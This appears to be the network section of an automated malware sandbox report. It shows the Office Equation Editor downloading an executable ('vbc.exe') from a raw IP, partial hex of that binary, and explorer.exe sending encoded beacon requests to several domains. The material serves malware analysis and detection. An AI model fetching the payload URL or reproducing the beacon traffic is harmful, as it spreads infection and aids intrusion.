                                              Sep 15, 2021 11:41:58.786112070 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.786195993 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.786247969 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787759066 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787794113 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787818909 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787846088 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787868977 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787890911 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787913084 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787916899 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787930965 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787940025 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787955999 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787961960 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787976027 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.787986040 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.787995100 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788007975 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788016081 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788034916 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788059950 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788083076 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788093090 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788106918 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788117886 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788130045 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.788134098 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.788283110 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.799859047 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799904108 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799926043 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799948931 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799969912 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.799995899 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800020933 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800043106 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800066948 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800065994 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800091028 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800091982 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800096035 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800107002 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800113916 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800129890 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800137043 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800153017 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800162077 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800165892 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800189972 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800203085 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800215960 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800219059 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800237894 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800251961 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800261021 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800262928 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800283909 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800296068 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800306082 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800309896 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800328970 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800338030 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800352097 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800364971 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800379038 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800379038 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800403118 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800417900 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800425053 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800443888 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800448895 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800458908 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800471067 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800487995 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800493002 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800502062 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800515890 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800517082 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800539970 CEST8049165198.12.84.109192.168.2.22
                                              Sep 15, 2021 11:41:58.800559998 CEST4916580192.168.2.22198.12.84.109
                                              Sep 15, 2021 11:41:58.800565958 CEST8049165198.12.84.109192.168.2.22

                                              UDP Packets

Timestamp                             Source Port  Dest Port  Source IP     Dest IP
Sep 15, 2021 11:43:17.547328949 CEST  52167        53         192.168.2.22  8.8.8.8
Sep 15, 2021 11:43:17.581933975 CEST  53           52167      8.8.8.8       192.168.2.22
Sep 15, 2021 11:43:22.596507072 CEST  50591        53         192.168.2.22  8.8.8.8
Sep 15, 2021 11:43:22.714829922 CEST  53           50591      8.8.8.8       192.168.2.22
Sep 15, 2021 11:43:28.594424963 CEST  57805        53         192.168.2.22  8.8.8.8
Sep 15, 2021 11:43:28.637029886 CEST  53           57805      8.8.8.8       192.168.2.22
Sep 15, 2021 11:43:33.835074902 CEST  59030        53         192.168.2.22  8.8.8.8
Sep 15, 2021 11:43:33.886842012 CEST  53           59030      8.8.8.8       192.168.2.22
Sep 15, 2021 11:43:39.212805986 CEST  59185        53         192.168.2.22  8.8.8.8
Sep 15, 2021 11:43:39.257781982 CEST  53           59185      8.8.8.8       192.168.2.22

                                              DNS Queries

Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                      Type            Class
Sep 15, 2021 11:43:17.547328949 CEST  192.168.2.22  8.8.8.8  0x8eb8    Standard query (0)  www.hansel-design.com     A (IP address)  IN (0x0001)
Sep 15, 2021 11:43:22.596507072 CEST  192.168.2.22  8.8.8.8  0xc18c    Standard query (0)  www.aubergetoitrouge.com  A (IP address)  IN (0x0001)
Sep 15, 2021 11:43:28.594424963 CEST  192.168.2.22  8.8.8.8  0xfc43    Standard query (0)  www.corpmat.com           A (IP address)  IN (0x0001)
Sep 15, 2021 11:43:33.835074902 CEST  192.168.2.22  8.8.8.8  0x9c63    Standard query (0)  www.afishin.com           A (IP address)  IN (0x0001)
Sep 15, 2021 11:43:39.212805986 CEST  192.168.2.22  8.8.8.8  0x30e0    Standard query (0)  www.boxtobookshelf.com    A (IP address)  IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Sep 15, 2021 11:43:17.581933975 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | Name error (3) | www.hansel-design.com | none | none | A (IP address) | IN (0x0001)
                                              Sep 15, 2021 11:43:22.714829922 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.aubergetoitrouge.com | aubergetoitrouge.com |  | CNAME (Canonical name) | IN (0x0001)
                                              Sep 15, 2021 11:43:22.714829922 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | aubergetoitrouge.com |  | 144.217.61.66 | A (IP address) | IN (0x0001)
                                              Sep 15, 2021 11:43:28.637029886 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.corpmat.com | corpmat.com |  | CNAME (Canonical name) | IN (0x0001)
                                              Sep 15, 2021 11:43:28.637029886 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | corpmat.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                              Sep 15, 2021 11:43:33.886842012 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.afishin.com | afishin.xshoppy.shop |  | CNAME (Canonical name) | IN (0x0001)
                                              Sep 15, 2021 11:43:33.886842012 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | afishin.xshoppy.shop |  | 75.2.89.208 | A (IP address) | IN (0x0001)
                                              Sep 15, 2021 11:43:39.257781982 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.boxtobookshelf.com | boxtobookshelf.com |  | CNAME (Canonical name) | IN (0x0001)
                                              Sep 15, 2021 11:43:39.257781982 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | boxtobookshelf.com |  | 34.98.99.30 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 198.12.84.109
                                              • www.aubergetoitrouge.com
                                              • www.corpmat.com
                                              • www.afishin.com
                                              • www.boxtobookshelf.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.22 | 49165 | 198.12.84.109 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Timestamp | kBytes transferred | Direction | Data
                                              Sep 15, 2021 11:41:57.402611017 CEST | 0 | OUT | GET /cmd/vbc.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 198.12.84.109
                                              Connection: Keep-Alive
                                              Sep 15, 2021 11:41:57.576512098 CEST | 1 | IN | HTTP/1.1 200 OK
                                              Date: Wed, 15 Sep 2021 09:41:57 GMT
                                              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
                                              Last-Modified: Wed, 15 Sep 2021 04:42:06 GMT
                                              ETag: "83800-5cc0151fdab7b"
                                              Accept-Ranges: bytes
                                              Content-Length: 538624
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 c9 dd 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2e 08 00 00 08 00 00 00 00 00 00 6a 4d 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 4d 08 00 4f 00 00 00 00 60 08 00 f4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 08 00 0c 00 00 00 fc 4c 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 2d 08 00 00 20 00 00 00 2e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 05 00 00 00 60 08 00 00 06 00 00 00 30 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 08 00 00 02 00 00 00 36 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 1c 5f 01 00 03 00 00 00 6f 00 00 06 ac 9e 01 00 50 ae 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 
28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02 7b 07 00 00 04 58 54 2b 0d 04 04 4a 02 7b 07 00 00 04 58 54 2b 00 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 45 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 8b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 19 8d 10 00 00 01 0a 2b 00 06 2a 22 02 28 15 00 00 0a 00 2a 00 00 00 13 30 02 00 26 00 00 00 04 00 00 11
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0.jM `@ @MO`L H.textp- . `.rsrc`0@@.reloc6@BLMH?_oP~$}}}(*$}}}(}}*0O$}}}({}{}{}{}*:{(*0wR{,frp(-)r!p(-%r-p(-%r9p(-%+0}+'J{XT+J{XT+J{XT+*0rEp+*0rp+*0+*"(*0&
                                              Sep 15, 2021 11:41:57.576544046 CEST | 3 | IN | Data Raw: 00 03 16 32 12 04 16 32 0e 03 05 2f 0a 04 0e 04 fe 04 16 fe 01 2b 01 17 0a 06 2c 04 16 0b 2b 04 17 0b 2b 00 07 2a 22 02 28 15 00 00 0a 00 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 00
                                              Data Ascii: 22/+,++*"(*{*"}*{*"}*0{{,X{{,X+2{{,Y+{{,Y (((*"(*Z(
                                              Sep 15, 2021 11:41:57.576561928 CEST | 4 | IN | Data Raw: 00 02 28 39 00 00 06 16 fe 01 0b 07 2d ab 02 28 3a 00 00 06 00 2a 8a 00 28 1f 00 00 0a 00 16 28 20 00 00 0a 00 1f 0c 28 21 00 00 0a 00 72 0b 01 00 70 28 22 00 00 0a 00 2a 00 13 30 02 00 17 00 00 00 0b 00 00 11 00 02 7b 1b 00 00 04 7b 0c 00 00 04
                                              Data Ascii: (9-(:*(( (!rp("*0{{+*0K{{{{3{{{{+,{|#(**"JXT*N(rp("*0i{{{{
                                              Sep 15, 2021 11:41:57.576575994 CEST | 5 | IN | Data Raw: 13 06 11 06 3a 9b fe ff ff 28 25 00 00 0a 00 00 06 17 58 0a 06 7e 20 00 00 04 fe 04 13 07 11 07 3a 77 fe ff ff 02 28 37 00 00 06 00 28 25 00 00 0a 00 02 28 38 00 00 06 00 2a 00 00 13 30 01 00 3a 00 00 00 04 00 00 11 00 1f 0f 28 21 00 00 0a 00 02
                                              Data Ascii: :(%X~ :w(7(%(8*0:(!(/,(!(-,(!{o?*0((!(.,(!{o@*0P{{#{{,(++%{
                                              Sep 15, 2021 11:41:57.751707077 CEST | 7 | IN | Data Raw: 0a 00 02 7b 2d 00 00 04 17 6f 47 00 00 0a 00 02 7b 2d 00 00 04 72 27 02 00 70 6f 43 00 00 0a 00 02 7b 2d 00 00 04 17 6f 48 00 00 0a 00 02 7b 2d 00 00 04 18 6f 49 00 00 0a 00 02 7b 2d 00 00 04 20 45 02 00 00 20 f8 00 00 00 73 44 00 00 0a 6f 45 00
                                              Data Ascii: {-oG{-r'poC{-oH{-oI{- E sDoE{-oF{. @sAoB{.r=poC{.KsDoE{.oF{.rMpo:{.oJ{.OsKoL"@"PAsM
                                              Sep 15, 2021 11:41:57.751804113 CEST | 8 | IN | Data Raw: 00 00 04 28 70 00 00 0a 6f 71 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 4d 00 00 0a 28 4e 00 00 0a 00 02 17 28 4f 00 00 0a 00 02 20 ee 00 00 00 20 23 02 00 00 73 44 00 00 0a 28 50 00 00 0a 00 02 28 51 00 00 0a 02 7b 38 00 00 04 6f 52 00 00
                                              Data Ascii: (poq"@"PAsM(N(O #sD(P(Q{8oR(Q{7oRr-p(Cr.po:fsr(sbsK(U{7ot(V*0w(ur".po7Xsvswox
                                              Sep 15, 2021 11:41:57.751828909 CEST | 10 | IN | Data Raw: 00 06 11 10 6f 91 00 00 0a 26 2b 06 2b 04 2b 02 2b 00 00 17 13 18 38 8c fd ff ff 6a 00 28 92 00 00 0a 00 16 28 93 00 00 0a 00 73 60 00 00 06 28 94 00 00 0a 00 2a 13 30 01 00 0c 00 00 00 1e 00 00 11 00 02 7b 3b 00 00 04 0a 2b 00 06 2a 26 00 02 03
                                              Data Ascii: o&++++8j((s`(*0{;+*&};*0{<+*0T}<{?oSo:{@oWo:{>{;{9ooUoo*^}=((x**0
                                              Sep 15, 2021 11:41:57.751878023 CEST | 11 | IN | Data Raw: 00 11 48 10 0a 00 1e 0c 4f 09 0a 00 9e 0f 48 10 06 00 77 04 ba 09 12 00 1e 12 5e 0f 12 00 65 09 5e 0f 12 00 43 11 5e 0f 06 00 0c 01 de 07 12 00 08 0f 5e 0f 06 00 df 0e 64 12 06 00 4c 01 64 12 06 00 85 12 8f 0a 0e 00 bb 07 71 08 0a 00 92 12 b4 0f
                                              Data Ascii: HOHw^e^C^^dLdqW^I^;x^lq^^^h1q^^FqeO
                                              Sep 15, 2021 11:41:57.751900911 CEST | 12 | IN | Data Raw: 3c 0d 5f 00 0e 00 f1 22 00 00 00 00 86 18 3c 0d 06 00 10 00 fb 22 00 00 00 00 86 18 3c 0d 21 04 10 00 2a 23 00 00 00 00 86 00 e1 11 06 00 15 00 39 23 00 00 00 00 86 00 30 0b 5f 00 15 00 4a 23 00 00 00 00 86 00 c0 02 06 00 17 00 59 23 00 00 00 00
                                              Data Ascii: <_"<"<!*#9#0_J#Y#<*#####($<1$<<$1$%%
                                              Sep 15, 2021 11:41:57.751923084 CEST | 14 | IN | Data Raw: 00 00 00 00 86 08 5b 02 62 04 49 00 84 3c 00 00 00 00 86 08 69 02 5c 04 49 00 e4 3c 00 00 00 00 86 18 3c 0d 06 00 4a 00 fc 3c 00 00 00 00 81 00 36 01 67 04 4a 00 00 3d 00 00 00 00 81 00 0b 09 67 04 4c 00 28 3d 00 00 00 00 c4 00 d7 04 15 00 4e 00
                                              Data Ascii: [bI<i\I<<J<6gJ=gL(=N`=O<OT\QOREU/(W/(gWW
                                              Sep 15, 2021 11:41:57.751945019 CEST | 15 | IN | Data Raw: 2c 02 b9 02 3c 0d 96 01 09 01 42 08 33 02 81 02 7e 10 06 00 09 02 4e 00 57 01 81 01 3c 0d 49 02 89 01 3c 0d 06 00 c9 02 f2 0e 52 02 d1 02 49 12 58 02 d1 02 7b 00 58 02 d1 02 49 0d 5e 02 d9 02 24 09 64 02 e1 02 c1 12 6d 02 91 01 43 01 80 02 f1 02
                                              Data Ascii: ,<B3~NW<I<RIX{XI^$dmC@Qt!UI1<I1]!8*n07i<19BTHAAA)Q1]Yd<I


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.22 | 49166 | 144.217.61.66 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Sep 15, 2021 11:43:22.833062887 CEST | 565 | OUT | GET /r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.aubergetoitrouge.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:23.548243999 CEST | 566 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Wed, 15 Sep 2021 09:43:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              X-Powered-By: PHP/7.2.34
                                              Pragma: no-cache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Set-Cookie: PHPSESSID=fifvcc2msr8fmhvo5t3hl5aru1; path=/
                                              Location: http://aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7
                                              X-Powered-By: PleskLin


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.22 | 49167 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Sep 15, 2021 11:43:28.657859087 CEST | 567 | OUT | GET /r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.corpmat.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:28.772924900 CEST | 567 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "6139efab-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              3 | 192.168.2.22 | 49168 | 75.2.89.208 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Sep 15, 2021 11:43:33.907896996 CEST | 568 | OUT | GET /r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.afishin.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:34.201092958 CEST | 569 | IN | HTTP/1.1 301 Moved Permanently
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              4 | 192.168.2.22 | 49169 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Sep 15, 2021 11:43:39.279041052 CEST | 570 | OUT | GET /r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7 HTTP/1.1
                                              Host: www.boxtobookshelf.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Sep 15, 2021 11:43:39.395982027 CEST | 570 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 15 Sep 2021 09:43:39 GMT
